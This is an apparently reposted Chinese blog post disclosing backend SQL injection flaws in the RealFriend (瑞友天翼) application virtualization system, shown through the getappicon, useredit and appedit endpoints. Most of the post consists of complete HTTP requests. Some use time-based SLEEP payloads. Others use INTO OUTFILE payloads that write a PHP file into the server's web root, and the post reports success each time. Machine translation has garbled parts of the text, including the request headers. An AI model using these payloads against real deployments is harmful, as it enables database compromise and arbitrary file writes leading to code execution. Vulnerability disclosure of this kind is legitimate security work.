瑞友天翼应用虚拟化系统SQL注入漏洞(瑞友天翼注册机教程)

瑞友天翼应用虚拟化系统SQL注入漏洞最近网上公开了一些瑞友天翼应用虚拟化系统的 SQL 注入漏洞,经过挖掘发现,还存在一些后台 SQL 注入漏洞。 重点关注传入参数可控并且拼接到 SQL 语句中的代码。 geta

近日,网络上披露了瑞游天翼应用虚拟化系统的一个SQL注入漏洞。经排查,我们发现后台也存在SQL注入漏洞。

重点关注传入参数可控且与SQL 语句耦合的代码。

getappicon

首先检测登录状态,然后通过GET获取的参数ID直接连接到SQL语句。

登录后复制

GET /hmrao.php?s=/Admin/getappicon/id=1\’);SELECT+SLEEP(5)+AND(\’1 HTTP/1.1

主机: 192.168.222.145

不安全的升级请求: 1

User-Agent: Mozilla/5.0(Windows NT 10.0;Win64;x64) AppleWebKit/537.36(KHTML、Gecko 等) Chrome/85.0.4183.83 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

参考: http://192.168.222.145/hmrao.php

Accept-Encoding: gzip、deflate

接受语言: zh-CN,zh;q=0.9

Cookie: PHPSESSID=c3gnn42nnfafaei5im0ti44tp2; think_lang=zh-CN;

关闭连接:

1.2.3.4.5.6.7.8.9.10。

打印出执行的SQL语句,发现SQL成功关闭。

登录后复制

GET /hmrao.php?s=/Admin/getappicon/id=1\’);select%20\’?php%20phpinfo();\’%20into%20outfile%20%27C:\\\\Program%20Files%20(x86) \\\\RealFriend\\\\Rap%20Server\\\\WebRoot\\\\test1.php%27%23 HTTP/1.1

主机: 192.168.222.145

不安全的升级请求: 1

User-Agent: Mozilla/5.0(Windows NT 10.0;Win64;x64) AppleWebKit/537.36(KHTML、Gecko 等) Chrome/85.0.4183.83 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

参考: http://192.168.222.145/hmrao.php

Accept-Encoding: gzip、deflate

接受语言: zh-CN,zh;q=0.9

Cookie: PHPSESSID=c3gnn42nnfafaei5im0ti44tp2; think_lang=zh-CN;

关闭连接:

1.2.3.4.5.6.7.8.9.10。

文件已成功写入根目录。

useredit

首先检测登录状态,然后通过GET获取的参数ID直接连接到SQL语句。

这里可以看到检测登录状态的函数是adminchecklogin。

这里的发现是基于路由sessId的,所以我们需要将cookie连接到路由器上。

登录后复制

GET /hmrao.php?s=/Admin/useredit/sessId/c3gnn42nnfafaei5im0ti44tp2uid=1\’);SELECT+SLEEP(5)%23 HTTP/1.1

主机: 192.168.222.145

不安全的升级请求: 1

User-Agent: Mozilla/5.0(Windows NT 10.0;Win64;x64) AppleWebKit/537.36(KHTML、Gecko 等) Chrome/85.0.4183.83 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

参考: http://192.168.222.145/hmrao.php

Accept-Encoding: gzip、deflate

接受语言: zh-CN,zh;q=0.9

Cookie: PHPSESSID=c3gnn42nnfafaei5im0ti44tp2; think_lang=zh-CN;

关闭连接:

1.2.3.4.5.6.7.8.9.10。

登录后复制

GET /hmrao.php?s=/Admin/useredit/sessId/c3gnn42nnfafaei5im0ti44tp2uid=1\’);select%20\’?php%20phpinfo();\’%20into%20outfile%20%27C:\\\\Program%20Files%20( x86)\\\\RealFriend\\\\Rap%20Server\\\\WebRoot\\\\test2.php%27%23 HTTP/1.1

主机: 192.168.222.145

不安全的升级请求: 1

User-Agent: Mozilla/5.0(Windows NT 10.0;Win64;x64) AppleWebKit/537.36(KHTML、Gecko 等) Chrome/85.0.4183.83 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

参考: http://192.168.222.145/hmrao.php

Accept-Encoding: gzip、deflate

接受语言: zh-CN,zh;q=0.9

Cookie: PHPSESSID=c3gnn42nnfafaei5im0ti44tp2; think_lang=zh-CN;

关闭连接:

1.2.3.4.5.6.7.8.9.10。

文件已成功写入根目录。

appedit

首先检测登录状态,然后通过GET获取的参数ID直接连接到SQL语句。

这里检测登录状态的函数也是adminchecklogin

所以cookie也需要和路由相连接。

登录后复制

GET /hmrao.php?s=/Admin/appedit/sessId/c3gnn42nnfafaei5im0ti44tp2id=0\’);select+sleep(5)%23 HTTP/1.1

主机: 192.168.222.145

不安全的升级请求: 1

User-Agent: Mozilla/5.0(Windows NT 10.0;Win64;x64) AppleWebKit/537.36(KHTML、Gecko 等) Chrome/85.0.4183.83 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

参考: http://192.168.222.145/hmrao.php

Accept-Encoding: gzip、deflate

接受语言: zh-CN,zh;q=0.9

Cookie: PHPSESSID=c3gnn42nnfafaei5im0ti44tp2; think_lang=zh-CN;

关闭连接:

1.2.3.4.5.6.7.8.9.10。

登录后复制

GET /hmrao.php?s=/Admin/appedit/sessId/c3gnn42nnfafaei5im0ti44tp2id=0\’);select%20\’?php%20phpinfo();\’%20into%20outfile%20%27C:\\\\Program%20Files%20( x86)\\\\RealFriend\\\\Rap%20Server\\\\WebRoot\\\\test.php%27%23 HTTP/1.1

主机: 192.168.222.145

不安全的升级请求: 1

User-Agent: Mozilla/5.0(Windows NT 10.0;Win64;x64) AppleWebKit/537.36(KHTML、Gecko 等) Chrome/85.0.4183.83 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

参考: http://192.168.222.145/hmrao.php

Accept-Encoding: gzip、deflate

接受语言: zh-CN,zh;q=0.9

Cookie: PHPSESSID=c3gnn42nnfafaei5im0ti44tp2; think_lang=zh-CN;

关闭连接:

1.2.3.4.5.6.7.8.9.10。

文件已成功写入根目录。

原作者: u_14601424 转载来源: https://blog.51cto.com/u_14601424/11335754

#瑞游天翼以上有关应用虚拟化系统SQL注入漏洞的相关内容摘自互联网,供大家参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92904.html

(0)
CSDN's avatarCSDN
上一篇 2024年7月4日 下午4:35
下一篇 2024年7月4日 下午4:35

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注